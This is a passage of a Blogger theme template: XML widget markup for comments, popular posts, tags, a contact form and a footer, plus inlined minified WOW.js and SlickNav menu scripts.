text'><data:top.shareToPinterestMsg/></span></a></b:if><b:if cond='data:top.showPlusOne'><div
class='goog-inline-block google-plus-share-container'><data:post.googlePlusShareTag/></div></b:if>

</b:includable>

<b:includable id='status-message'>

<b:if cond='data:navMessage'>

<div class='status-msg-wrap'>

<div class='status-msg-body'>

<data:navMessage/>

</div>

<div class='status-msg-border'>

<div class='status-msg-bg'>

<div class='status-msg-hidden'><data:navMessage/></div>

</div>

</div>

</div>

<div style='clear: both;'/>

<b:if cond='data:blog.pageType == &quot;error_page&quot;'>

<div class='post-404'>

<div class='actions-404'>

<div class='ops-404'><span>Oops;</span> Sorry, but the page you were trying to view does not
exist.

</div>

<div class='title-404'>404</div>
<div class='link-404'>

<a href='/'><i class='fa fa-car'/>

<trans>Back to Home</trans></a>

</div></div>

</div>

<style>

.post-404 {

padding-top: 40px;

padding-bottom: 60px;

.actions-404 {

width: 100%;

float: right;

text-align: center;

.ops-404 {

width: 50%;

margin: 0 auto;

font-size: 26px;

font-weight: 400;

.ops-404 span {

font-weight: 700;

.title-404 {

font-size: 200px;

font-weight: 700;

line-height: 1.1;

.link-404 {

font-size: 18px;
padding-top: 20px;

padding-bottom: 50px;

#blog-pager, #sidebar-wrapper,.status-msg-wrap {

display: none;

.status-msg-border {

border: 0 !important;

.status-msg-bg {

background-color: #fff;

#main-wrapper {

width: 100%;

max-width: 100%;

</style>

</b:if>

</b:if>

</b:includable>

<b:includable id='threaded-comment-form' var='post'>

<div class='comment-form'>

<a name='comment-form'/>

<b:if cond='data:mobile'>

<p><data:blogCommentMessage/></p>

<data:blogTeamBlogMessage/>

<a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/>

<iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post'


expr:height='data:cmtIframeInitialHeight' frameborder='0' id='comment-editor' name='comment-
editor' src='' style='display: none' width='100%'/>

<b:else/>
<p><data:blogCommentMessage/></p>

<data:blogTeamBlogMessage/>

<a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/>

<iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post'


expr:height='data:cmtIframeInitialHeight' frameborder='0' id='comment-editor' name='comment-
editor' src='' width='100%'/>

</b:if>

<data:post.cmtfpIframe/>

<script type='text/javascript'>

BLOG_CMT_createIframe(&#39;<data:post.appRpcRelayPath/>&#39;);

</script>

</div>

</b:includable>

<b:includable id='threaded_comment_js' var='post'>

<script async='async' expr:src='data:post.commentSrc' type='text/javascript'/>

<script type='text/javascript'>

(function() {

var items = <data:post.commentJso/>;

var msgs = <data:post.commentMsgs/>;

var config = <data:post.commentConfig/>;

// <![CDATA[

var cursor = null;

if (items && items.length > 0) {

cursor = parseInt(items[items.length - 1].timestamp) + 1;

var bodyFromEntry = function(entry) {

if (entry.gd$extendedProperty) {

for (var k in entry.gd$extendedProperty) {

if (entry.gd$extendedProperty[k].name == 'blogger.contentRemoved') {
return '<span class="deleted-comment">' + entry.content.$t + '</span>';

return entry.content.$t;

var parse = function(data) {

cursor = null;

var comments = [];

if (data && data.feed && data.feed.entry) {

for (var i = 0, entry; entry = data.feed.entry[i]; i++) {

var comment = {};

// comment ID, parsed out of the original id format

var id = /blog-(\d+).post-(\d+)/.exec(entry.id.$t);

comment.id = id ? id[2] : null;

comment.body = bodyFromEntry(entry);

comment.timestamp = Date.parse(entry.published.$t) + '';

if (entry.author && entry.author.constructor === Array) {

var auth = entry.author[0];

if (auth) {

comment.author = {

name: (auth.name ? auth.name.$t : undefined),

profileUrl: (auth.uri ? auth.uri.$t : undefined),

avatarUrl: (auth.gd$image ? auth.gd$image.src : undefined)

};

if (entry.link) {

if (entry.link[2]) {

comment.link = comment.permalink = entry.link[2].href;


}

if (entry.link[3]) {

var pid = /.*comments\/default\/(\d+)\?.*/.exec(entry.link[3].href);

if (pid && pid[1]) {

comment.parentId = pid[1];

comment.deleteclass = 'item-control blog-admin';

if (entry.gd$extendedProperty) {

for (var k in entry.gd$extendedProperty) {

if (entry.gd$extendedProperty[k].name == 'blogger.itemClass') {

comment.deleteclass += ' ' + entry.gd$extendedProperty[k].value;

} else if (entry.gd$extendedProperty[k].name == 'blogger.displayTime') {

comment.displayTime = entry.gd$extendedProperty[k].value;

comments.push(comment);

return comments;

};

var paginator = function(callback) {

if (hasMore()) {

var url = config.feed + '?alt=json&v=2&orderby=published&reverse=false&max-results=50';

if (cursor) {

url += '&published-min=' + new Date(cursor).toISOString();

window.bloggercomments = function(data) {
var parsed = parse(data);

cursor = parsed.length < 50 ? null

: parseInt(parsed[parsed.length - 1].timestamp) + 1

callback(parsed);

window.bloggercomments = null;

url += '&callback=bloggercomments';

var script = document.createElement('script');

script.type = 'text/javascript';

script.src = url;

document.getElementsByTagName('head')[0].appendChild(script);

};

var hasMore = function() {

return !!cursor;

};

var getMeta = function(key, comment) {

if ('iswriter' == key) {

var matches = !!comment.author

&& comment.author.name == config.authorName

&& comment.author.profileUrl == config.authorUrl;

return matches ? 'true' : '';

} else if ('deletelink' == key) {

return config.baseUri + '/delete-comment.g?blogID='

+ config.blogId + '&postID=' + comment.id;

} else if ('deleteclass' == key) {

return comment.deleteclass;

return '';

};
var replybox = null;

var replyUrlParts = null;

var replyParent = undefined;

var onReply = function(commentId, domId) {

if (replybox == null) {

// lazily cache replybox, and adjust to suit this style:

replybox = document.getElementById('comment-editor');

if (replybox != null) {

replybox.height = '250px';

replybox.style.display = 'block';

replyUrlParts = replybox.src.split('#');

if (replybox && (commentId !== replyParent)) {

replybox.src = '';

document.getElementById(domId).insertBefore(replybox, null);

replybox.src = replyUrlParts[0]

+ (commentId ? '&parentID=' + commentId : '')

+ '#' + replyUrlParts[1];

replyParent = commentId;

};

var hash = (window.location.hash || '#').substring(1);

var startThread, targetComment;

if (/^comment-form_/.test(hash)) {

startThread = hash.substring('comment-form_'.length);

} else if (/^c[0-9]+$/.test(hash)) {

targetComment = hash.substring(1);

}
// Configure commenting API:

var configJso = {

'maxDepth': config.maxThreadDepth

};

var provider = {

'id': config.postId,

'data': items,

'loadNext': paginator,

'hasMore': hasMore,

'getMeta': getMeta,

'onReply': onReply,

'rendered': true,

'initComment': targetComment,

'initReplyThread': startThread,

'config': configJso,

'messages': msgs

};

var render = function() {

if (window.goog && window.goog.comments) {

var holder = document.getElementById('comment-holder');

window.goog.comments.render(holder, provider);

};

// render now, or queue to render when library loads:

if (window.goog && window.goog.comments) {

render();

} else {

window.goog = window.goog || {};


window.goog.comments = window.goog.comments || {};

window.goog.comments.loadQueue = window.goog.comments.loadQueue || [];

window.goog.comments.loadQueue.push(render);

})();

// ]]>

</script>

</b:includable>

<b:includable id='threaded_comments' var='post'>

<div class='comments' id='comments'>

<a name='comments'/>

<h4><data:post.commentLabelFull/>:</h4>

<div class='comments-content'>

<b:include cond='data:post.embedCommentForm' data='post' name='threaded_comment_js'/>

<div id='comment-holder'>

<data:post.commentHtml/>

</div>

</div>

<p class='comment-footer'>

<b:if cond='data:post.allowNewComments'>

<b:include data='post' name='threaded-comment-form'/>

<b:else/>

<data:post.noNewCommentsText/>

</b:if>

</p>

<b:if cond='data:showCmtPopup'>

<div id='comment-popup'>
<iframe allowtransparency='true' frameborder='0' id='comment-actions' name='comment-
actions' scrolling='no'>

</iframe>

</div>

</b:if>

<div id='backlinks-container'>

<div expr:id='data:widget.instanceId + &quot;_backlinks-container&quot;'>

<b:include cond='data:post.showBacklinks' data='post' name='backlinks'/>

</div>

</div>

</div>

</b:includable>

</b:widget>

</b:section>

</div>

<div id='sidebar-wrapper'>

<b:section class='sidebar' id='sidebar' preferred='yes'>

<b:widget id='PopularPosts1' locked='false' title='Popular' type='PopularPosts' version='1'>

<b:widget-settings>

<b:widget-setting name='numItemsToShow'>5</b:widget-setting>

<b:widget-setting name='showThumbnails'>true</b:widget-setting>

<b:widget-setting name='showSnippets'>true</b:widget-setting>

<b:widget-setting name='timeRange'>LAST_YEAR</b:widget-setting>

</b:widget-settings>

<b:includable id='main'>

<b:if cond='data:title != &quot;&quot;'><h2><data:title/></h2></b:if>

<div class='widget-content popular-posts'>

<ul>

<b:loop values='data:posts' var='post'>


<li>

<b:if cond='!data:showThumbnails'>

<b:if cond='!data:showSnippets'>

<!-- (1) No snippet/thumbnail -->

<a expr:href='data:post.href'><data:post.title/></a>

<b:else/>

<!-- (2) Show only snippets -->

<div class='item-title'><a expr:href='data:post.href'><data:post.title/></a></div>

<div class='item-snippet'><data:post.snippet/></div>

</b:if>

<b:else/>

<!-- (3) Show only thumbnails or (4) Snippets and thumbnails. -->

<div expr:class='data:showSnippets ? &quot;item-content&quot; : &quot;item-


thumbnail-only&quot;'>

<b:if cond='data:post.thumbnail'>

<div class='item-thumbnail'>

<a expr:href='data:post.href'>

<img border='0' expr:alt='data:post.title' expr:height='data:thumbnailSize'


expr:src='data:post.thumbnail' expr:width='data:thumbnailSize'/>

</a>

</div>

</b:if>

<div class='item-title'><a expr:href='data:post.href'><data:post.title/></a></div>

<b:if cond='data:showSnippets'>

<div class='item-snippet'><data:post.snippet/></div>

</b:if>

</div>

<div style='clear: both;'/>

</b:if>

</li>

</b:loop>

</ul>
<!--b:include name='quickedit'/-->

</div>

</b:includable>

</b:widget>

<b:widget id='Label1' locked='false' title='Tags' type='Label' version='1'>

<b:widget-settings>

<b:widget-setting name='sorting'>ALPHA</b:widget-setting>

<b:widget-setting name='display'>CLOUD</b:widget-setting>

<b:widget-setting name='selectedLabelsList'/>

<b:widget-setting name='showType'>ALL</b:widget-setting>

<b:widget-setting name='showFreqNumbers'>false</b:widget-setting>

</b:widget-settings>

<b:includable id='main'>

<b:if cond='data:title != &quot;&quot;'>

<h2><data:title/></h2>

</b:if>

<div expr:class='&quot;widget-content &quot; + data:display + &quot;-label-widget-


content&quot;'>

<b:if cond='data:display == &quot;list&quot;'>

<ul>

<b:loop values='data:labels' var='label'>

<li>

<b:if cond='data:blog.url == data:label.url'>

<span expr:dir='data:blog.languageDirection'><data:label.name/></span>

<b:else/>

<a expr:dir='data:blog.languageDirection' expr:href='data:label.url'><data:label.name/></a>

</b:if>

<b:if cond='data:showFreqNumbers'>

<span dir='ltr'>(<data:label.count/>)</span>

</b:if>

</li>
</b:loop>

</ul>

<b:else/>

<b:loop values='data:labels' var='label'>

<span expr:class='&quot;label-size label-size-&quot; + data:label.cssSize'>

<b:if cond='data:blog.url == data:label.url'>

<span expr:dir='data:blog.languageDirection'><data:label.name/></span>

<b:else/>

<a expr:dir='data:blog.languageDirection' expr:href='data:label.url'><data:label.name/></a>

</b:if>

<b:if cond='data:showFreqNumbers'>

<span class='label-count' dir='ltr'>(<data:label.count/>)</span>

</b:if>

</span>

</b:loop>

</b:if>

<!--b:include name='quickedit'/-->

</div>

</b:includable>

</b:widget>

</b:section>

</div>

<div style='clear: both;'/>

</div>

<!-- end content-wrapper -->

<b:if cond='data:blog.pageType != &quot;static_page&quot;'>

<b:if cond='data:blog.pageType!= &quot;item&quot;'>

<b:if cond='data:blog.pageType != &quot;error_page&quot;'>

<div class='main-gallery wow fadeInRight' id='section-5' style='visibility: visible;'>

<div class='gallery-cell'>

<div class='testimonial'>
<img class='testimonial-avatar' src='http://1.bp.blogspot.com/-
zjRQwZusQuA/WaUu4AM9p_I/AAAAAAAADug/68l5-
04iSWoVMAkpi8iQGM430fUYKAzdACK4BGAYYCw/s400/128.jpg'/>

<q class='testimonial-quote'>&quot;Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis
mauris ex, gravida ut leo eu, rhoncus porta orci. Fusce vitae rutrum nulla.&quot;</q>

<span class='testimonial-author'>Joe Smith, CEO of Cubix</span>

</div>

</div>

<div class='gallery-cell'>

<div class='testimonial'>

<img class='testimonial-avatar' src='http://4.bp.blogspot.com/-


B1N0s6e1Y90/WaUvFDHMc7I/AAAAAAAADuo/5L4qayXHNiAWVAgZhTRhJ7S2VSAL-E-
3QCK4BGAYYCw/s400/128%2B%25281%2529.jpg'/>

<q class='testimonial-quote'>&quot;Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis
mauris ex, gravida ut leo eu, rhoncus porta orci. Fusce vitae rutrum nulla.&quot;</q>

<span class='testimonial-author'>Lisa Jones, Freelance Web Developer</span>

</div>

</div>

<div class='gallery-cell'>

<div class='testimonial'>

<img class='testimonial-avatar' src='http://1.bp.blogspot.com/--


AljITWu1is/WaUvSgSDbEI/AAAAAAAADuw/5FZ7WobSdtAVINLVQT3qpCSktRNlDA23gCK4BGAYYCw/s
400/128.jpg'/>

<q class='testimonial-quote'>&quot;Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis
mauris ex, gravida ut leo eu, rhoncus porta orci. Fusce vitae rutrum nulla.&quot;</q>

<span class='testimonial-author'>Ryan Waltz, Front-End Developer</span>

</div>

</div>

</div>

<div style='clear:both'/>

<div class='tysum-wrapper wow fadeInLeftBig'>

<b:section class='featured-box row preload' id='Featured Summary' maxwidget='1'


showaddelement='yes'>
<b:widget id='HTML293' locked='true' title='Featured Listings' type='HTML' version='1'>

<b:widget-settings>

<b:widget-setting name='content'><![CDATA[<span data-type="tysum" data-label="Beauty" data-


no="4"></span>]]></b:widget-setting>

</b:widget-settings>

<b:includable id='main'>

<!-- only display title if it's non-empty -->

<b:if cond='data:title != &quot;&quot;'>

<h2 class='title'><data:title/></h2>

</b:if>

<div class='widget-content'>

<data:content/>

</div>

<!--b:include name='quickedit'/-->

</b:includable>

</b:widget>

</b:section>

</div>

<div style='clear: both;'/>

<div class='insta-wrap' id='section-7'>

<div class='contact-title'>

<h4>Get in Touch</h4>

<span>Feel free to drop us a line to contact us</span>

</div>

<div style='clear:both'/>

<div class='row' id='sora_blogger_cntct_form'>

<div class='wrap-me wow fadeInLeft' data-wow-delay='0.2s' style='visibility: visible;'>

<b:section class='sora-contact-widget' id='Contact Widget' maxwidgets='1' name='Contact Form


Widget' showaddelement='no'>

<b:widget id='ContactForm1' locked='false' title='Contact Form' type='ContactForm' version='1'>

<b:includable id='main'>
<div class='contact-form-widget'>

<div class='form'>

<form name='contact-form'>

<p/>

<span class='name-bg'>Name*</span>

<br/>

<input class='contact-form-name' expr:id='data:widget.instanceId + &quot;_contact-form-


name&quot;' name='name' size='30' type='text' value=''/>

<p/>

<span class='email-bg'>Email*</span>

<br/>

<input class='contact-form-email' expr:id='data:widget.instanceId + &quot;_contact-form-


email&quot;' name='email' size='30' type='text' value=''/>

<p/>

<span class='message-bg'>Message*</span>

<br/>

<textarea class='contact-form-email-message' cols='25' expr:id='data:widget.instanceId +


&quot;_contact-form-email-message&quot;' name='email-message' rows='5'/>

<p/>

<span class='send-bg'>

<input class='contact-form-button contact-form-button-submit' expr:id='data:widget.instanceId


+ &quot;_contact-form-submit&quot;' expr:value='data:contactFormSendMsg'
type='button'/></span>

<span class='clear-bg'><input class='contact-form-button contact-form-button-submit clear-button'


type='reset' value='Clear'/></span>

<p/>

<div style='max-width: 100%; text-align: center; width: 100%;'>

<div class='contact-form-error-message' id='ContactForm1_contact-form-error-message'>

</div>

<div class='contact-form-success-message' id='ContactForm1_contact-form-success-message'>

</div>

</div>

</form>
</div>

</div>

<b:include name='quickedit'/>

</b:includable>

</b:widget>

</b:section>

<br/>

</div>

</div>

<div id='sora_blogger_cntct_form-wrap'>

<div class='row' id='sora_blogger_cntct_form'>

<div class='map-me wow fadeInRight' data-wow-delay='0s' style='visibility: visible;'>

<div class='contact-other'>

<ul class='con-list'>

<li><i class='lnr lnr-phone'/><span class='con-list-head'>Phone</span><span>+610-401-6021, +610-


401-6022</span></li>

<li><i class='lnr lnr-map'/><span class='con-list-head'>Address</span><span>3066 Stone Lane,


Wayne, Pennsylvania.</span></li>

<li><i class='lnr lnr-envelope'/><span class='con-list-


head'>Email</span><span>soratemplate@gmail.com</span></li>

</ul>

</div>

</div>

</div>

</div>

</div>

</b:if></b:if></b:if>

<div style='clear: both;'/>

<div class='bot-bar-menu'>

<div class='bot-menu-wrap row'>


<b:section class='bot-menu' id='Bottom-menu' maxwidgets='1' showaddelement='yes'>

<b:widget id='PageList1' locked='true' title='Pages' type='PageList' version='1'>

<b:widget-settings>

<b:widget-setting name='pageListJson'><![CDATA[{'2298958999057142266': {'href':


'https://folio-soratemplates.blogspot.com/p/about.html', 'title': 'About', 'position': 0},
'1850697708364910884': {'href': 'https://folio-soratemplates.blogspot.com/p/contact-us.html',
'title': 'Contact Us', 'position': 1}}]]></b:widget-setting>

<b:widget-setting name='homeTitle'>Home</b:widget-setting>

</b:widget-settings>

<b:includable id='main'>

<b:if cond='data:title != &quot;&quot;'><h2><data:title/></h2></b:if>

<div class='widget-content'>

<b:if cond='data:mobile'>

<select expr:id='data:widget.instanceId + &quot;_select&quot;'>

<b:loop values='data:links' var='link'>

<option expr:value='data:link.href'>

<b:attr cond='data:link.isCurrentPage' name='selected' value='selected'/>

<data:link.title/>

</option>

</b:loop>

</select>

<span class='pagelist-arrow'>&amp;#9660;</span>

<b:else/>

<ul id='nav2'>

<b:loop values='data:links' var='link'>

<li>

<b:class cond='data:link.isCurrentPage' name='selected'/>

<a expr:href='data:link.href'><data:link.title/></a>

</li>

</b:loop>

</ul>

</b:if>
<!--<b:include name='quickedit'/>-->

</div>

</b:includable>

</b:widget>

</b:section>

<div class='jugas_footer_copyright'>

Created By <a href='http://soratemplates.com/' id='mycontent' rel='dofollow'


title='Free Blogger Templates'>SoraTemplates</a> | Distributed By <a
href='https://gooyaabitemplates.com/' rel='dofollow' style='color:#ffbd2f;' target='_blank'>Gooyaabi
Templates</a>

</div>

<b:section class='bottom-bar-social blue' id='Footer social widget' maxwidgets='1' name='Footer


Social Widget' showaddelement='no'>

<b:widget id='LinkList236' locked='true' title='Social Media Icons' type='LinkList' version='1'>

<b:widget-settings>

<b:widget-setting name='link-3'>#</b:widget-setting>

<b:widget-setting name='sorting'>NONE</b:widget-setting>

<b:widget-setting name='link-4'>#</b:widget-setting>

<b:widget-setting name='text-1'>twitter</b:widget-setting>

<b:widget-setting name='link-1'>#</b:widget-setting>

<b:widget-setting name='text-0'>facebook</b:widget-setting>

<b:widget-setting name='link-2'>#</b:widget-setting>

<b:widget-setting name='text-3'>bloglovin</b:widget-setting>

<b:widget-setting name='link-0'>#</b:widget-setting>

<b:widget-setting name='text-2'>gplus</b:widget-setting>

<b:widget-setting name='text-4'>instagram</b:widget-setting>

</b:widget-settings>

<b:includable id='main'>

<div class='widget-content'>

<ul id='social'>
<b:loop values='data:links' var='link'>

<li><a expr:class='data:link.name' expr:href='data:link.target'


expr:title='data:link.name'/></li>

</b:loop>

</ul>

</div>

</b:includable>

</b:widget>

</b:section>

</div>

</div>

&lt;/div&gt;

<script>

/*<![CDATA[*/

/*! WOW wow.js - v1.3.0 - 2016-10-04

* https://wowjs.uk

* Copyright (c) 2016 Thomas Grainger; Licensed MIT */!function(a,b){if("function"==typeof


define&&define.amd)define(["module","exports"],b);else if("undefined"!=typeof
exports)b(module,exports);else{var c={exports:{}};b(c,c.exports),a.WOW=c.exports}}
(this,function(a,b){"use strict";function c(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a
class as a function")}function d(a,b){return b.indexOf(a)>=0}function e(a,b){for(var c in
b)if(null==a[c]){var d=b[c];a[c]=d}return a}function f(a){return/Android|webOS|iPhone|iPad|iPod|
BlackBerry|IEMobile|Opera Mini/i.test(a)}function g(a){var b=arguments.length<=1||void
0===arguments[1]?!1:arguments[1],c=arguments.length<=2||void 0===arguments[2]?!
1:arguments[2],d=arguments.length<=3||void 0===arguments[3]?null:arguments[3],e=void 0;return
null!=document.createEvent?
(e=document.createEvent("CustomEvent"),e.initCustomEvent(a,b,c,d)):null!
=document.createEventObject?
(e=document.createEventObject(),e.eventType=a):e.eventName=a,e}function h(a,b){null!
=a.dispatchEvent?a.dispatchEvent(b):b in(null!=a)?a[b]():"on"+b in(null!=a)&&a["on"+b]()}function
i(a,b,c){null!=a.addEventListener?a.addEventListener(b,c,!1):null!=a.attachEvent?
a.attachEvent("on"+b,c):a[b]=c}function j(a,b,c){null!=a.removeEventListener?
a.removeEventListener(b,c,!1):null!=a.detachEvent?a.detachEvent("on"+b,c):delete a[b]}function k()
{return"innerHeight"in window?
window.innerHeight:document.documentElement.clientHeight}Object.defineProperty(b,"__esModu
le",{value:!0});var l,m,n=function(){function a(a,b){for(var c=0;c<b.length;c++){var
d=b[c];d.enumerable=d.enumerable||!1,d.configurable=!0,"value"in d&&(d.writable=!
0),Object.defineProperty(a,d.key,d)}}return function(b,c,d){return
c&&a(b.prototype,c),d&&a(b,d),b}}(),o=window.WeakMap||window.MozWeakMap||function()
{function a(){c(this,a),this.keys=[],this.values=[]}return n(a,[{key:"get",value:function(a){for(var
b=0;b<this.keys.length;b++){var c=this.keys[b];if(c===a)return this.values[b]}}},
{key:"set",value:function(a,b){for(var c=0;c<this.keys.length;c++){var d=this.keys[c];if(d===a)return
this.values[c]=b,this}return this.keys.push(a),this.values.push(b),this}}]),a}
(),p=window.MutationObserver||window.WebkitMutationObserver||
window.MozMutationObserver||(m=l=function(){function a(){c(this,a),"undefined"!=typeof
console&&null!==console&&(console.warn("MutationObserver is not supported by your
browser."),console.warn("WOW.js cannot detect dom mutations, please call .sync() after loading
new content."))}return n(a,[{key:"observe",value:function(){}}]),a}(),l.notSupported=!
0,m),q=window.getComputedStyle||function(a){var b=/(\-([a-z])
{1})/g;return{getPropertyValue:function(c)
{"float"===c&&(c="styleFloat"),b.test(c)&&c.replace(b,function(a,b){return b.toUpperCase()});var
d=a.currentStyle;return(null!=d?d[c]:void 0)||null}}},r=function(){function a(){var
b=arguments.length<=0||void 0===arguments[0]?
{}:arguments[0];c(this,a),this.defaults={boxClass:"wow",animateClass:"animated",offset:0,mobile:!
0,live:!0,callback:null,scrollContainer:null,resetAnimation:!0},this.animate=function()
{return"requestAnimationFrame"in window?function(a){return
window.requestAnimationFrame(a)}:function(a){return a()}}
(),this.vendors=["moz","webkit"],this.start=this.start.bind(this),this.resetAnimation=this.resetAnima
tion.bind(this),this.scrollHandler=this.scrollHandler.bind(this),this.scrollCallback=this.scrollCallback.b
ind(this),this.scrolled=!0,this.config=e(b,this.defaults),null!
=b.scrollContainer&&(this.config.scrollContainer=document.querySelector(b.scrollContainer)),this.a
nimationNameCache=new o,this.wowEvent=g(this.config.boxClass)}return n(a,
[{key:"init",value:function()
{this.element=window.document.documentElement,d(document.readyState,
["interactive","complete"])?
this.start():i(document,"DOMContentLoaded",this.start),this.finished=[]}},
{key:"start",value:function(){var a=this;if(this.stopped=!
1,this.boxes=[].slice.call(this.element.querySelectorAll("."+this.config.boxClass)),this.all=this.boxes.sl
ice(0),this.boxes.length)if(this.disabled())this.resetStyle();else for(var b=0;b<this.boxes.length;b++)
{var c=this.boxes[b];this.applyStyle(c,!0)}if(this.disabled()||(i(this.config.scrollContainer||
window,"scroll",this.scrollHandler),i(window,"resize",this.scrollHandler),this.interval=setInterval(this
.scrollCallback,50)),this.config.live){var d=new p(function(b){for(var c=0;c<b.length;c++)for(var
d=b[c],e=0;e<d.addedNodes.length;e++){var
f=d.addedNodes[e];a.doSync(f)}});d.observe(document.body,{childList:!0,subtree:!0})}}},
{key:"stop",value:function(){this.stopped=!0,j(this.config.scrollContainer||
window,"scroll",this.scrollHandler),j(window,"resize",this.scrollHandler),null!
=this.interval&&clearInterval(this.interval)}},{key:"sync",value:function()
{p.notSupported&&this.doSync(this.element)}},{key:"doSync",value:function(a){if("undefined"!
=typeof a&&null!==a||(a=this.element),1===a.nodeType){a=a.parentNode||a;for(var
b=a.querySelectorAll("."+this.config.boxClass),c=0;c<b.length;c++){var e=b[c];d(e,this.all)||
(this.boxes.push(e),this.all.push(e),this.stopped||this.disabled()?this.resetStyle():this.applyStyle(e,!
0),this.scrolled=!0)}}}},{key:"show",value:function(a){return
this.applyStyle(a),a.className=a.className+" "+this.config.animateClass,null!
=this.config.callback&&this.config.callback(a),h(a,this.wowEvent),this.config.resetAnimation&&(i(a,"
animationend",this.resetAnimation),i(a,"oanimationend",this.resetAnimation),i(a,"webkitAnimation
End",this.resetAnimation),i(a,"MSAnimationEnd",this.resetAnimation)),a}},
{key:"applyStyle",value:function(a,b){var c=this,d=a.getAttribute("data-wow-
duration"),e=a.getAttribute("data-wow-delay"),f=a.getAttribute("data-wow-iteration");return
this.animate(function(){return c.customStyle(a,b,d,e,f)})}},{key:"resetStyle",value:function(){for(var
a=0;a<this.boxes.length;a++){var b=this.boxes[a];b.style.visibility="visible"}}},
{key:"resetAnimation",value:function(a){if(a.type.toLowerCase().indexOf("animationend")>=0){var
b=a.target||a.srcElement;b.className=b.className.replace(this.config.animateClass,"").trim()}}},
{key:"customStyle",value:function(a,b,c,d,e){return
b&&this.cacheAnimationName(a),a.style.visibility=b?"hidden":"visible",c&&this.vendorSet(a.style,
{animationDuration:c}),d&&this.vendorSet(a.style,{animationDelay:d}),e&&this.vendorSet(a.style,
{animationIterationCount:e}),this.vendorSet(a.style,
{animationName:b?"none":this.cachedAnimationName(a)}),a}},{key:"vendorSet",value:function(a,b)
{for(var c in b)if(b.hasOwnProperty(c)){var d=b[c];a[""+c]=d;for(var e=0;e<this.vendors.length;e++)
{var f=this.vendors[e];a[""+f+c.charAt(0).toUpperCase()+c.substr(1)]=d}}}},
{key:"vendorCSS",value:function(a,b){for(var
c=q(a),d=c.getPropertyCSSValue(b),e=0;e<this.vendors.length;e++){var f=this.vendors[e];d=d||
c.getPropertyCSSValue("-"+f+"-"+b)}return d}},{key:"animationName",value:function(a){var b=void
0;try{b=this.vendorCSS(a,"animation-name").cssText}catch(c){b=q(a).getPropertyValue("animation-
name")}return"none"===b?"":b}},{key:"cacheAnimationName",value:function(a){return
this.animationNameCache.set(a,this.animationName(a))}},
{key:"cachedAnimationName",value:function(a){return this.animationNameCache.get(a)}},
{key:"scrollHandler",value:function(){this.scrolled=!0}},{key:"scrollCallback",value:function()
{if(this.scrolled){this.scrolled=!1;for(var a=[],b=0;b<this.boxes.length;b++){var c=this.boxes[b];if(c)
{if(this.isVisible(c)){this.show(c);continue}a.push(c)}}this.boxes=a,this.boxes.length||
this.config.live||this.stop()}}},{key:"offsetTop",value:function(a){for(;void
0===a.offsetTop;)a=a.parentNode;for(var
b=a.offsetTop;a.offsetParent;)a=a.offsetParent,b+=a.offsetTop;return b}},
{key:"isVisible",value:function(a){var b=a.getAttribute("data-wow-offset")||
this.config.offset,c=this.config.scrollContainer&&this.config.scrollContainer.scrollTop||
window.pageYOffset,d=c+Math.min(this.element.clientHeight,k())-
b,e=this.offsetTop(a),f=e+a.clientHeight;return d>=e&&f>=c}},{key:"disabled",value:function()
{return!this.config.mobile&&f(navigator.userAgent)}}]),a}();b["default"]=r,a.exports=b["default"]});

new WOW().init();

// this has nothing to do with the animation, just forces the window to be a size that allows a scroll

var containerHeight = $(window).height() / 2;


$('.spacer').css("height", containerHeight);

// Find the height of the previous section, half it so when you have scrolled more than half past the
section, it triggers the animation

var x = $('.skills').prev().height() / 4;

$(window).scroll(function() {

// checks to see if you have scrolled far enough down to activate the animation

if ($(window).scrollTop() >= x) {

//find each element with the class .skill-percent

$('.skill-percent').each(function() {

// animate

$(this).animate({

//finds the width from the data-percent attribute

width: $(this).data('percent') + '%'

}, 1000);

});

});

/*]]>*/

</script>

<script type='text/javascript'>

//<![CDATA[

/*!

SlickNav Responsive Mobile Menu

(c) 2014 Josh Cope

licensed under MIT

*/

;(function(e,t,n){function o(t,n)
{this.element=t;this.settings=e.extend({},r,n);this._defaults=r;this._name=i;this.init()}var
r={label:"MENU",duplicate:true,duration:200,easingOpen:"swing",easingClose:"swing",closedSymbo
l:"&#9658;",openedSymbol:"&#9660;",prependTo:"body",parentTag:"a",closeOnClick:false,allowPar
entLinks:false,nestedParentLinks:true,showChildren:false,init:function(){},open:function()
{},close:function(){}},i="slicknav",s="slicknav";o.prototype.init=function(){var n=this;var
r=e(this.element);var i=this.settings;if(i.duplicate)
{n.mobileNav=r.clone();n.mobileNav.removeAttr("id");n.mobileNav.find("*").each(function(t,n)
{e(n).removeAttr("id")})}else n.mobileNav=r;var o=s+"_icon";if(i.label===""){o+=" "+s+"_no-
text"}if(i.parentTag=="a"){i.parentTag='a href="#"'}n.mobileNav.attr("class",s+"_nav");var u=e('<div
class="'+s+'_menu"></div>');n.btn=e("<"+i.parentTag+' aria-haspopup="true" tabindex="0"
class="'+s+"_btn "+s+'_collapsed"><span class="'+s+'_menutxt">'+i.label+'</span><span
class="'+o+'"><span class="'+s+'_icon-bar"></span><span class="'+s+'_icon-bar"></span><span
class="'+s+'_icon-
bar"></span></span></a>');e(u).append(n.btn);e(i.prependTo).prepend(u);u.append(n.mobileNav);v
ar a=n.mobileNav.find("li");e(a).each(function(){var t=e(this);var
r={};r.children=t.children("ul").attr("role","menu");t.data("menu",r);if(r.children.length>0){var
o=t.contents();var u=false;var a=[];e(o).each(function(){if(!e(this).is("ul")){a.push(this)}else{return
false}if(e(this).is("a")){u=true}});var f=e("<"+i.parentTag+' role="menuitem" aria-haspopup="true"
tabindex="-1" class="'+s+'_item"/>');if(!i.allowParentLinks||i.nestedParentLinks||!u){var
l=e(a).wrapAll(f).parent();l.addClass(s+"_row")}else e(a).wrapAll('<span class="'+s+"_parent-link
"+s+'_row"/>').parent();t.addClass(s+"_collapsed");t.addClass(s+"_parent");var c=e('<span
class="'+s+'_arrow">'+i.closedSymbol+"</span>");if(i.allowParentLinks&&!
i.nestedParentLinks&&u)c=c.wrap(f).parent();e(a).last().after(c)}else if(t.children().length===0)
{t.addClass(s+"_txtnode")}t.children("a").attr("role","menuitem").click(function(t)
{if(i.closeOnClick&&!
